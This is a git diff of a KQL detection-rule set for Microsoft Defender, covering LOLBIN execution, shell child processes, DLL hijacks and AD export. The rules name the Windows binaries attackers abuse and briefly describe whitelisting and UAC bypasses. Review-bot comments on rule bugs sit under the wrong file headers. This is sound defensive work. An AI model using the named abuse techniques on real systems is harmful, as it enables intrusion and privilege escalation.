file diff --git a/KQL/rules/Execution/use_of_fsharp_interpreters.kql b/KQL/rules/Execution/use_of_fsharp_interpreters.kql index d49fc8e5..26f958b5 100644 --- a/KQL/rules/Execution/use_of_fsharp_interpreters.kql +++ b/KQL/rules/Execution/use_of_fsharp_interpreters.kql 
@@ -1,13 +1,13 @@ -// Title: Use of FSharp Interpreters -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022-06-02 -// Level: medium -// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" -// Both can be used for AWL bypass and to execute F# code via scripts or inline. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate use by a software developer. - -DeviceProcessEvents +// Title: Use of FSharp Interpreters +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-02 +// Level: medium +// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" +// Both can be used for AWL bypass and to execute F# code via scripts or inline. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by a software developer. + +DeviceProcessEvents | where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or (ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/use_of_openconsole.kql b/KQL/rules/Execution/use_of_openconsole.kql index c788c810..fe0deb3a 100644 --- a/KQL/rules/Execution/use_of_openconsole.kql +++ b/KQL/rules/Execution/use_of_openconsole.kql 
@@ -1,12 +1,12 @@ -// Title: Use of OpenConsole -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-16 -// Level: medium -// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate use by an administrator - -DeviceProcessEvents +// Title: Use of OpenConsole +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-16 +// Level: medium +// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by an administrator + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal")) \ No newline at end of file diff --git a/KQL/rules/Execution/use_of_pcalua_for_execution.kql b/KQL/rules/Execution/use_of_pcalua_for_execution.kql index c207111c..baaccf74 100644 --- a/KQL/rules/Execution/use_of_pcalua_for_execution.kql +++ b/KQL/rules/Execution/use_of_pcalua_for_execution.kql 
@@ -1,12 +1,12 @@ -// Title: Use of Pcalua For Execution -// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2022-06-14 -// Level: medium -// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate use by a via a batch script or by an administrator. - -DeviceProcessEvents +// Title: Use of Pcalua For Execution +// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2022-06-14 +// Level: medium +// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by a via a batch script or by an administrator. + +DeviceProcessEvents | where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql b/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql index 3723f641..cb302d18 100644 --- a/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql +++ b/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql 
@@ -1,12 +1,12 @@ -// Title: VBA DLL Loaded Via Office Application -// Author: Antonlovesdnb -// Date: 2020-02-19 -// Level: high -// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 -// False Positives: -// - Legitimate macro usage. Add the appropriate filter according to your environment - -DeviceImageLoadEvents +// Title: VBA DLL Loaded Via Office Application +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: high +// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Legitimate macro usage. Add the appropriate filter according to your environment + +DeviceImageLoadEvents | where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql index 2b040cef..858789b3 100644 --- a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql +++ b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql 
@@ -1,12 +1,12 @@ -// Title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-11 -// Level: medium -// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate use by developers as part of NodeJS development with Visual Studio Tools - -DeviceProcessEvents +// Title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use by developers as part of NodeJS development with Visual Studio Tools + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql index 5cc63a7d..3975e524 100644 --- a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql +++ b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql 
@@ -1,10 +1,10 @@ -// Title: Visual Studio NodejsTools PressAnyKey Renamed Execution -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2023-04-11 -// Level: medium -// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Visual Studio NodejsTools PressAnyKey Renamed Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2023-04-11 +// Level: medium +// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql b/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql index 9a2c15a4..707a88f1 100644 --- a/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql +++ b/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql 
@@ -1,12 +1,12 @@ -// Title: VMToolsd Suspicious Child Process -// Author: bohops, Bhabesh Raj -// Date: 2021-10-08 -// Level: high -// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.t1059 -// False Positives: -// - Legitimate use by VM administrator - -DeviceProcessEvents +// Title: VMToolsd Suspicious Child Process +// Author: bohops, Bhabesh Raj +// Date: 2021-10-08 +// Level: high +// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.t1059 +// False Positives: +// - Legitimate use by VM administrator + +DeviceProcessEvents | where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe")))) \ No newline at end of file 
diff --git a/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql index 886b490c..83ee6204 100644 --- a/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-20 -// Level: medium -// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql b/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql index 34de7ab7..6b5f1455 100644 --- a/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql +++ b/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql 
@@ -1,10 +1,10 @@ -// Title: Windows Shell/Scripting Application File Write to Suspicious Folder -// Author: Florian Roth (Nextron Systems) -// Date: 2021-11-20 -// Level: high -// Description: Detects Windows shells and scripting applications that write files to suspicious folders -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceFileEvents +// Title: Windows Shell/Scripting Application File Write to Suspicious Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-20 +// Level: high +// Description: Detects Windows shells and scripting applications that write files to suspicious folders +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\sh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath startswith "C:\\PerfLogs\\" or FolderPath startswith "C:\\Users\\Public\\")) or ((InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\forfiles.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe") and (FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql b/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql index da1becd3..46a52999 100644 
--- a/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql
+++ b/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql
@@ -1,10 +1,10 @@
-// Title: WinSxS Executable File Creation By Non-System Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-11
-// Level: medium
-// Description: Detects the creation of binaries in the WinSxS folder by non-system processes
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceFileEvents
+// Title: WinSxS Executable File Creation By Non-System Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-11
+// Level: medium
+// Description: Detects the creation of binaries in the WinSxS folder by non-system processes
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceFileEvents
 | where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/wmic_remote_command_execution.kql b/KQL/rules/Execution/wmic_remote_command_execution.kql
index e50bd567..4cf2f286 100644
--- a/KQL/rules/Execution/wmic_remote_command_execution.kql
+++ b/KQL/rules/Execution/wmic_remote_command_execution.kql
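Review bot: The exclusion `InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\"` in the `| where` line has a typo ("Systems32"), so processes running from the real `C:\Windows\System32\` are never excluded and every WinSxS executable write by a System32-hosted process (servicing and update components are likely candidates) will alert despite the "Non-System Process" intent. The line should read `InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\"`. Whether the typo originated in the Sigma source or in the converter, the generated KQL needs the corrected path (or the source fixed and the rule regenerated), and a regression check that a System32 initiator is filtered would catch this in future conversions.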
@@ -1,10 +1,10 @@ -// Title: WMIC Remote Command Execution -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-14 -// Level: medium -// Description: Detects the execution of WMIC to query information on a remote system -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: WMIC Remote Command Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC to query information on a remote system +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-node:" or ProcessCommandLine contains "/node:" or ProcessCommandLine contains "–node:" or ProcessCommandLine contains "—node:" or ProcessCommandLine contains "―node:") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "localhost" or ProcessCommandLine contains "127.0.0.1"))) \ No newline at end of file diff --git a/KQL/rules/Execution/wmiprvse_spawned_a_process.kql b/KQL/rules/Execution/wmiprvse_spawned_a_process.kql index ae0f8e79..e6735784 100644 --- a/KQL/rules/Execution/wmiprvse_spawned_a_process.kql +++ b/KQL/rules/Execution/wmiprvse_spawned_a_process.kql 
@@ -1,12 +1,12 @@
-// Title: WmiPrvSE Spawned A Process
-// Author: Roberto Rodriguez @Cyb3rWard0g
-// Date: 2019-08-15
-// Level: medium
-// Description: Detects WmiPrvSE spawning a process
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-// False Positives:
-// - False positives are expected (e.g. in environments where WinRM is used legitimately)
-
-DeviceProcessEvents
+// Title: WmiPrvSE Spawned A Process
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-15
+// Level: medium
+// Description: Detects WmiPrvSE spawning a process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+// False Positives:
+// - False positives are expected (e.g. in environments where WinRM is used legitimately)
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql
index b4e26873..b72e7a95 100644
--- a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql
+++ b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql
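Review bot: `LogonId in~ ("0x3e7", "null")` in the `| where` line compares what is a numeric column in DeviceProcessEvents against string literals; `in~` is a string operator in Kusto, so this either fails to compile or never matches, and the SYSTEM-logon exclusion the Sigma filter intends (0x3e7 = 999) is silently lost. The comparison should be `LogonId == 999`, and since `isnull(LogonId)` is already present the `"null"` string is redundant. The `AccountName contains "AUTHORI"` / `"AUTORI"` clauses presumably target `NT AUTHORITY\SYSTEM`, but in MDE the domain part is usually reported in `AccountDomain` rather than `AccountName`, so that part of the filter may also never match and should be verified against real events before relying on it to suppress noise.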
@@ -1,10 +1,10 @@ -// Title: Wmiprvse Wbemcomn DLL Hijack -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-10-12 -// Level: high -// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002 - -DeviceImageLoadEvents +// Title: Wmiprvse Wbemcomn DLL Hijack +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-12 +// Level: high +// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002 + +DeviceImageLoadEvents | where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql index f6e0b02d..33a1e19f 100644 --- a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql +++ b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql 
@@ -1,10 +1,10 @@
-// Title: Wmiprvse Wbemcomn DLL Hijack - File
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-10-12
-// Level: critical
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002
-
-DeviceFileEvents
+// Title: Wmiprvse Wbemcomn DLL Hijack - File
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll"
\ No newline at end of file
diff --git a/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql b/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql
index 8694f687..f10c0b30 100644
--- a/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql
+++ b/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql
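Review bot: `InitiatingProcessFolderPath =~ "System"` in the `| where` line maps the Sigma `Image: System` condition onto a full-path column; for the kernel System process that column is unlikely to equal the bare string "System", in which case this critical-level rule never fires. The intended match is most likely on the process name rather than the path, e.g. `InitiatingProcessFileName =~ "System"`, or on `InitiatingProcessId == 4`, and which of these MDE actually populates for an SMB-driven write into `\wbem\` should be confirmed against real DeviceFileEvents rather than assumed. A header note recording which field was validated would help the next regeneration avoid reverting the fix.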
@@ -1,10 +1,10 @@
-// Title: WScript or CScript Dropper - File
-// Author: Tim Shelton
-// Date: 2022-01-10
-// Level: high
-// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007
-
-DeviceFileEvents
+// Title: WScript or CScript Dropper - File
+// Author: Tim Shelton
+// Date: 2022-01-10
+// Level: high
+// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData")
\ No newline at end of file
diff --git a/KQL/rules/Execution/wscript_shell_run_in_commandline.kql b/KQL/rules/Execution/wscript_shell_run_in_commandline.kql
index 1ce27ea6..57b5d581 100644
--- a/KQL/rules/Execution/wscript_shell_run_in_commandline.kql
+++ b/KQL/rules/Execution/wscript_shell_run_in_commandline.kql
@@ -1,12 +1,12 @@
-// Title: Wscript Shell Run In CommandLine
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-31
-// Level: medium
-// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly
-
-DeviceProcessEvents
+// Title: Wscript Shell Run In CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-31
+// Level: medium
+// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run"
\ No newline at end of file
diff --git a/KQL/rules/Execution/wsl_child_process_anomaly.kql b/KQL/rules/Execution/wsl_child_process_anomaly.kql
index ee953413..8975570c 100644
--- a/KQL/rules/Execution/wsl_child_process_anomaly.kql
+++ b/KQL/rules/Execution/wsl_child_process_anomaly.kql
@@ -1,10 +1,10 @@
-// Title: WSL Child Process Anomaly
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-23
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
-
-DeviceProcessEvents
+// Title: WSL Child Process Anomaly
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-23
+// Level: medium
+// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
index ab9c6fc9..e708dda6 100644
--- a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
+++ b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
@@ -1,11 +1,11 @@
-// Title: Wusa.EXE Executed By Parent Process Located In Suspicious Location
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-11-26
-// Level: high
-// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
-// Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Wusa.EXE Executed By Parent Process Located In Suspicious Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-26
+// Level: high
+// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
+// Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) and (not(ProcessCommandLine contains ".msu"))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql b/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql
index c25f0f74..760ddca2 100644
--- a/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql
+++ b/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql
@@ -1,10 +1,10 @@
-// Title: Active Directory Structure Export Via Csvde.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-14
-// Level: medium
-// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.discovery, attack.t1087.002
-
-DeviceProcessEvents
+// Title: Active Directory Structure Export Via Csvde.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.discovery, attack.t1087.002
+
+DeviceProcessEvents
